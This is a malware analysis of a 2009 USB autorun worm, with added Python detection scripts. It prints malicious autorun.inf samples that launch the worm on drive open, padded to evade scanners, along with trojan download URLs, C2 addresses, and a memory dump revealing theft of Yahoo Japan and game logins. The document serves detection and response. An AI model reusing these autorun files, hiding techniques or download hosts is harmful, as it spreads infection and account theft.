Key malicious behaviours of the "USB drive virus" 2009-02-11
Infection symptoms known so far:
1. "Show hidden files and folders" is enabled, yet hidden files and folders still do not appear.
2. Opening a drive (C:, D:, E:) from My Computer brings up the "Choose the program you want to use to open this file" dialog instead.
3. The instant messenger (即时通) closes by itself right after login.
4. Antivirus software is disabled.
5. New antivirus software cannot be installed.
6. Safe Mode cannot be entered the normal way.
7. A trojan downloader is bundled in.
8. Network driver errors leave the machine unable to connect.
9. Kaspersky drivers are damaged, so updates fail or some protection components error out.
Files created
1. %systemdrive%\autorun.inf
Analysis of the autorun.inf contents
Sample 1:
;ww9KrOoa8Li9diKi194p4oijej52K2A55fw4Hkd7i9d7wkC3wLK32k1qjSap4aZrf42
[AutoRun]
;ws6L2cijpA5lKksr0aKdAks1irm7k3skawd1ZawaLpDiok2k40jLk3a4sLwClwwr
open=8ot8y86.exe
;CoaA5Z4DloqLoAlDd15kDrKKs12a735wia4kDws2flda5il4aksrfA8Sq3kZ28rJo0e6Ld2Lkai2mS2sIwiqLs
shell\open\Command=8ot8y86.exe
;8lDqd48lkfo4arKqo92sk3DwsawJZir4wLdlSd3
shell\open\Default=1
;adLl62rK5LDLo44DKsqlq2L0Ka4kJkarliKsif3lLaa1fsO0f23K18aZ2jk73ksfkoAq54wdkfKIdjirdqqwd5koadaoAiojddDl5qkkeC3LSSiiaak8lUw
shell\explore\Command=8ot8y86.exe
;S5LdLZadf4Aw34LA0La0243UoawKck3keAk3a2kd4isKwk6fds2j7lDK3wK10LwjKKawi5os2ikSolrJCrp9i0aJq2AkIsraO2jpksa8301Dlijk
Sample 2:
[AutoRun]
Open=weiai.exe
Shell\Open=湖羲(&O)
Shell\Open\Command=weiai.exe
Shell\Open\Default=1
Shell\Explore=訧埭夺烩(&X)
Shell\Explore\Command=weiai.exe
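The two samples above show the pattern a defender can key on: every launch entry (open=, shell\open\Command=, shell\explore\Command=) points at the same executable, shell\open\Default=1 makes a double-click on the drive run it, and the long ";..." lines are padding that changes from copy to copy. The following Python script is an added example, not part of the original post; it parses the [AutoRun] section, extracts what would be launched, and reports those findings. The two sample strings are constructed to mirror the post's captures (the menu labels are replaced by plain English placeholders), and the benign sample and the 40-character comment threshold are assumptions for the example.

```python
import re

# Constructed samples modelled on the two autorun.inf captures in the post
# (same layout and file names; not byte-for-byte copies).
SAMPLE_1 = r""";ww9KrOoa8Li9diKi194p4oijej52K2A55fw4Hkd7i9d7wkC3wLK32k1qjSap4aZrf42
[AutoRun]
;ws6L2cijpA5lKksr0aKdAks1irm7k3skawd1ZawaLpDiok2k40jLk3a4sLwClwwr
open=8ot8y86.exe
shell\open\Command=8ot8y86.exe
shell\open\Default=1
shell\explore\Command=8ot8y86.exe
"""

SAMPLE_2 = r"""[AutoRun]
Open=weiai.exe
Shell\Open=Open(&O)
Shell\Open\Command=weiai.exe
Shell\Open\Default=1
Shell\Explore=Explore(&X)
Shell\Explore\Command=weiai.exe
"""

# A benign autorun.inf of the kind shipped on install CDs (constructed).
BENIGN = """[autorun]
icon=setup.ico
label=Product Install Disc
"""

EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".pif", ".scr", ".vbs", ".js")
# Keys that make Windows run something: open=, shellexecute=, shell\<verb>\command=
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$")
LONG_COMMENT = 40   # assumed threshold: comment lines longer than this count as padding


def parse_autorun(text):
    """Parse the [AutoRun] section. Returns (entries, stats); keys are lower-cased."""
    entries, stats = {}, {"comments": 0, "long_comments": 0}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):                      # INI comment line
            stats["comments"] += 1
            if len(line) > LONG_COMMENT:
                stats["long_comments"] += 1
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries, stats


def launch_targets(text):
    """Set of file names (lower-cased) that the launch keys would execute."""
    entries, _ = parse_autorun(text)
    targets = set()
    for key, value in entries.items():
        if LAUNCH_KEY.match(key) and value:
            targets.add(value.strip('"').split()[0].lower())
    return targets


def analyze_autorun(text):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    entries, stats = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        if LAUNCH_KEY.match(key) and value.lower().endswith(EXEC_EXT):
            findings.append(f"{key} runs executable {value}")
    if entries.get("shell\\open\\default") == "1":
        findings.append("shell\\open is the default verb: double-clicking the drive runs the payload")
    if stats["long_comments"]:
        findings.append(f"{stats['long_comments']} long junk comment lines (padding against signature scanners)")
    targets = launch_targets(text)
    if len(targets) == 1 and sum(1 for k in entries if LAUNCH_KEY.match(k)) >= 2:
        findings.append(f"all launch keys point at {next(iter(targets))}")
    return findings


if __name__ == "__main__":
    for name, sample in (("sample 1", SAMPLE_1), ("sample 2", SAMPLE_2), ("benign", BENIGN)):
        print(name, launch_targets(sample), analyze_autorun(sample))
```

Keys are compared case-insensitively because Windows does not care about case in autorun.inf (Sample 2 uses Open= and Shell\Open\Command=, Sample 1 uses open= and shell\open\Command=); a check that only looked for the lower-case spelling would miss one of them.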
Files generated in the drive root
2. %systemdrive%\********.com (also .exe, .bat, .cmd or .pif; the name varies)
ntde1ect.com
ntdelect.com
nldelect.com
nndelect.com
nsdelect.com
ntdeIect.com
erdeIect.com
XAdeIect.com
copetttt.com
ek.com
f.cmd
nncu6kk.com
g2p3s.exe
8e9gmih.bat
lg.cmd
um.cmd
q83iwmgf.bat
rn.exe
h.cmd
8h3hh3m.exe
bxuup9r.bat
w0owgn.bat
2ifetri.cmd
188qsm.bat
x.com
ep9otvan.com
3wcxx91.cmd
e.bat
8ot8y86.exe
t.exe
3g08.bat
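Two things stand out in the root-directory names above: several are near-misses of the legitimate boot file ntdetect.com with a letter swapped for a look-alike character (ntde1ect.com, ntdeIect.com, nldelect.com), and the rest are short or digit-laden random names with executable extensions. The Python below is an added example, not code from the post; it folds look-alike characters, measures edit distance against an allow-list of legitimate root files, and flags random-looking executables. The allow-list, the confusable-character map and the distance threshold of 2 are assumptions chosen for this example.

```python
import os

# Files that legitimately live in the root of a Windows system drive
# (constructed allow-list for the example; extend it for your own builds).
LEGIT_ROOT_FILES = {
    "ntdetect.com", "ntldr", "boot.ini", "bootmgr", "io.sys", "msdos.sys",
    "config.sys", "autoexec.bat", "pagefile.sys", "hiberfil.sys",
}
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".pif", ".scr")

# Characters that look alike in common Windows fonts, folded to one form.
CONFUSABLE = str.maketrans({"1": "l", "i": "l", "|": "l", "0": "o"})


def levenshtein(a, b):
    """Plain edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(name):
    """Lower-case and fold confusable characters so ntdeIect and ntde1ect compare equal."""
    return name.lower().translate(CONFUSABLE)


def classify_root_file(name, max_distance=2):
    """Return None for a benign name, otherwise a short reason string."""
    lowered = name.lower()
    if lowered in LEGIT_ROOT_FILES:
        return None
    folded = normalize(lowered)
    # 1. Near-miss of a legitimate system file (ntde1ect.com, ntdeIect.com, nldelect.com ...)
    distance, closest = min(
        (levenshtein(folded, normalize(legit)), legit) for legit in sorted(LEGIT_ROOT_FILES)
    )
    if distance <= max_distance:
        return f"lookalike:{closest}"
    # 2. Executable with a very short or digit-laden name (8e9gmih.bat, x.com, g2p3s.exe ...)
    stem, ext = os.path.splitext(lowered)
    if ext in EXEC_EXT:
        if len(stem) <= 2 or any(c.isdigit() for c in stem):
            return "random-name executable"
        return "unknown executable"
    return None


def triage_root_listing(names):
    """Map each suspicious name in a drive-root listing to the reason it was flagged."""
    flagged = {}
    for name in names:
        reason = classify_root_file(name)
        if reason is not None:
            flagged[name] = reason
    return flagged


if __name__ == "__main__":
    # Constructed listing mixing names from the post with ordinary user files.
    listing = ["ntdetect.com", "ntde1ect.com", "ntdeIect.com", "g2p3s.exe",
               "x.com", "copetttt.com", "report.docx", "boot.ini"]
    for name, reason in triage_root_listing(listing).items():
        print(f"{name:16} {reason}")
```

The look-alike check fires before the random-name check, so a file that imitates a system name is reported with the name it imitates; on a clean machine nothing in the root of a removable drive should match either rule, which makes the output short enough to review by hand.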
3. Files under %System%
%System%\kavo.exe
%System%\kavo0.dll~kavo9.dll
%System%\taso.exe
%System%\taso0~9.dll
%System%\tavo.exe
%System%\tavo0~9.dll
%System%\avpo.exe
%System%\avpo0~9.dll
%System%\amvo.exe
%System%\amvo0~9.dll
%System%\mmvo.exe
%System%\mmvo0~9.dll
%System%\mnso.exe
%System%\mnso0~9.dll
%System%\kxvo.exe
%System%\kxvo0.dll~kxvo9.dll
%System%\uret463.exe
%System%\lhgjyit0.dll~lhgjyit9.dll
%System%\kacsde.exe
%System%\godert0.dll~godert9.dll
%System%\jvvo.exe
%System%\jvvo0~9.dll
%System%\amwo.exe
%System%\amwo0~9.dll
%System%\j3ewro.exe
%System%\jwedsfdo0~9.dll
%System%\revo.exe
%System%\revo0~9.dll
%System%\lhgjyit0.dll
%System%\lhgjyit2.dll
%System%\uret463.exe
4. %windir%\Debug\***********.dll (random name)
5. %windir%\help\**************.dll (random name)
6. %windir%\fly32.dll
7. %windir%\poor32.dll
8. %Temp%\moil.dll
9. Files under the temp directories
C:\Documents and Settings\Administrator\Local Settings\Temp\*.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\taso*
C:\Documents and Settings\Administrator\Local Settings\Temp\cc.exe
C:\WINDOWS\TEMP\taso*
C:\WINDOWS\TEMP\*.dll
Note: on Win95/98/ME the default %System% is C:\windows\System;
on WinNT/2000/XP/2003 the default %System% is C:\WinNT\System32.
Processes created
wuauclt.exe
explorer.exe
IEXPLORER.EXE
gigaget.exe
utorrent.exe
msnmsgr.exe
Loaded into system process:
explorer.exe (run via kavo1.dll)
Network drivers damaged
c:\windows\system32\drivers\tdi.sys
c:\windows\system32\drivers\psched.sys
c:\windows\system32\drivers\tcpip.sys
j3ewro.exe damages the Kaspersky drivers, so updates fail or some protection components error out
c:\windows\system32\j3ewro.exe
c:\windows\system32\drivers\vga.sys
c:\windows\system32\drivers\klif.sys
c:\windows\system32\cdplay.sys
Registry entries added
Startup (Run) entries
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kavo = "%System%\kavo.exe" (runs at boot)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<anhtaaa><C:\WINDOWS\system32\kacsde.exe>
<dorfgwe><C:\WINDOWS\system32\uret463.exe>
kavo.exe
kxvo.exe
tavo.exe
mnsa.exe
avpa.exe
amva.exe
tava.exe
tasa.exe
kava.exe
amwa.exe
jvsoft.exe
tasoft.exe
kmmsoft.exe
kacsde.exe
uret463.exe
Keys created
{7A908760-8000-4000-A000-9000322145A7}
{59109876-7619-9101-7012-901938475195}
{EC69134A-F15F-D14D-A31A-C31C4D124FCE}
{35FD6584-698F-BCD2-602C-698745210353}
{B1954FAC-1023-154F-895A-1458258AD81B}
{AA041F13-A111-12A3-B0CF-F99818AA68AA}
{21BE5FDF-D4CB-4850-AD99-21E68B50BF3F}
{27E1C1B0-7117-4582-8565-682E569810D2}
{FBF3B337-FEB6-403B-BBE2-2B67CB6563E3}
{5D7ED61B-DB3E-44EC-BED5-40307384FF81}
{47994C89-1857-4D33-B196-263ED6FA4CFF}
{E996F10E-FCAF-41CC-94C8-B8BF7D6F80AC}
{B058B02A-AC93-4FBA-900B-FA44D9B92805}
{79FC744E-75CA-49B0-8F02-AEAE4CAACBE0}
{749E4FEF-6AFF-41A6-AED8-364222D455A7}
{894C0068-46AC-4F59-A140-EDE0DABA776C}
{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
Registry modification
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
CheckedValue = 0x00000000 (keeps hidden files hidden on the system)
Downloaded from the network: trojan variants
http://det67.com...c1.rar %Temp%\cc1.rar
hxxp://www.1a123.com/jj/cc.rar (%Temp%\cc.rar)
http://13opd.com/...u1.rar %Temp%\uu1.rar
http://vfqa4.com...l.rar %Temp%\ll.rar
http://dfvg2.com/...lp.rar %Temp%\help.rar
http://mgaazz.com...dr.rar %System%\ddr.exe
1a123.com... - 61.162.230.89
1a123.com
456kill.com
om7890.com... - 60.169.1.92
Microsofthg.com
Microsoftmg.com
Microsoftrb.com
Om7890.com
Tw7890.com
Data read directly from the memory region of explorer.exe:
015B2480 CLSID\MADOWN coc.exe aaa.dat XZQURSASABXAWLASOLSFSIKDQ_MN
015B24C0 NoDriveTypeAutoRun Software\Microsoft\Windows\CurrentVersion\Po
015B2500 licies\Explorer CheckedValue Software\Microsoft\Windows\Curre
015B2540 ntVersion\explorer\Advanced\Folder\Hidden\SHOWALL ShowSuperHid
015B2580 den Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\A
015B25C0 dvanced \explorer.exe nhkletd SoftWare\Microsoft\Windows\Curre
015B2600 ntVersion\Run autorun.inf %s%s C:\ IEFrame explorer.exe
015B2640 iexplore.exe Forthgoer 庵侐 211.13.235.228 庵゙ 211.
015B2680 13.235.227 庵媪 211.13.235.226 庵珨 211.13.235.229 Rage
015B26C0 xe.exe 40000 Altair(Non-PvP)
015B2700 40001 Arcturus 40002
015B2740 Vega(Non-PvP) 40003 Rigel
015B2780 40004 Sirius
015B27C0 40005 Canopus
015B2800 %s(%d)/ lin.bin %d=%s http
015B2840 s://login.yahoo.co.jp/config/login_verify2?.src=ym https://logi
015B2880 n.yahoo.co.jp/config/login? YahooWidgetEngine.exe YPagerj.exe
015B28C0 ? ? S-1-5-21-1409082233-839522115-1060284298-1003\So
015B2900 ftware\YahooJapan SHDeleteKeyA shlwapi.dll passwd 绞ゴ怀フ
015B2940 腔%s:%s login h t t p i?
015BFAC0 0u http://vfqa4.com/rbv/uu.rar
015C3000 胡0 蛞竽栓妨怯阐阐阐阐阐阐阐阐阐阐阐[AutoRun] ;44olSdjsmrpd3w
015C3040 iDHqoLa000lkjri0akiAa7Jk69kk9sd8kawsroep93wSLDr3rsa3SZkq8wsJilai
015C3080 jDefiwaaic30n5oK3os3DjaXFdsw2K1fiLa2aoKwrsj open=q6h6j.com ;jr
015C30C0 l7edjkwnjslke204riraZFl2iiLj1wdK7Ko5sok3l04w4D3ik3kkDrCLwk0o2eqq
015C3100 od9d2qsK54fw02Dd2ipoiwKwlJdKk4w8Dfsew41ifJ9sDKAarIa3rk shell\op
015C3140 en\Command=q6h6j.com
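The dump above is the kind of artefact an analyst pulls from an injected explorer.exe: each row is an offset followed by the printable bytes of that 0x40-byte region, so a single string is often split across two rows ("Po" / "licies\Explorer", "http" / "s://login.yahoo.co.jp/...", "211." / "13.235.227"). The Python below is an added example, not part of the original post; it glues contiguous rows back together, inserts a separator only where the offsets jump, and then extracts IP addresses, URLs, registry paths and executable names. The embedded DUMP is a constructed excerpt of the rows shown above with the mis-encoded characters removed; the 0x40 row size and the regular expressions are assumptions for the example.

```python
import re

# Constructed excerpt in the layout of the explorer.exe memory dump quoted above:
# hex offset, then the printable bytes of that 0x40-byte row. Consecutive rows are
# contiguous memory, so a token may be split across two rows ("Po" / "licies").
DUMP = r"""015B24C0 NoDriveTypeAutoRun Software\Microsoft\Windows\CurrentVersion\Po
015B2500 licies\Explorer CheckedValue Software\Microsoft\Windows\Curre
015B2540 ntVersion\explorer\Advanced\Folder\Hidden\SHOWALL ShowSuperHid
015B2640 iexplore.exe Forthgoer 211.13.235.228 211.
015B2680 13.235.227 211.13.235.226 211.13.235.229 Rage
015B2800 %s(%d)/ lin.bin %d=%s http
015B2840 s://login.yahoo.co.jp/config/login_verify2?.src=ym https://logi
015B2880 n.yahoo.co.jp/config/login? YahooWidgetEngine.exe YPagerj.exe
015BFAC0 0u http://vfqa4.com/rbv/uu.rar
"""

ROW_BYTES = 0x40   # assumed row width of the dump tool

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://\S+")
REG_RE = re.compile(r"software\\\S+", re.I)          # Software\Microsoft\... paths
EXE_RE = re.compile(r"\b[\w-]+\.(?:exe|dll)\b", re.I)


def reassemble(dump):
    """Join the text of consecutive rows; add a separator only where the offset jumps."""
    chunks, prev_off = [], None
    for line in dump.splitlines():
        if not line.strip():
            continue
        off_hex, _, text = line.partition(" ")
        off = int(off_hex, 16)
        if prev_off is not None and off != prev_off + ROW_BYTES:
            chunks.append(" ")          # non-contiguous rows: do not glue tokens together
        chunks.append(text)
        prev_off = off
    return "".join(chunks)


def extract_iocs(dump):
    """Pull the indicator types a responder would want from the reassembled text."""
    text = reassemble(dump)
    return {
        "ips": sorted(set(IP_RE.findall(text))),
        "urls": sorted(set(URL_RE.findall(text))),
        "registry": sorted(set(REG_RE.findall(text))),
        "executables": sorted(set(EXE_RE.findall(text))),
    }


if __name__ == "__main__":
    for kind, values in extract_iocs(DUMP).items():
        print(kind)
        for v in values:
            print("   ", v)
```

One caveat visible in the post's own dump: when the dump tool strips the NUL padding at the end of a row, two independent strings that meet at a row boundary (explorer.exe at the end of row 015B2600, iexplore.exe at the start of 015B2640) are glued into one token. Working from the raw bytes, where the NUL separators survive, avoids that; on a text-only dump, check any token that looks like two names joined together.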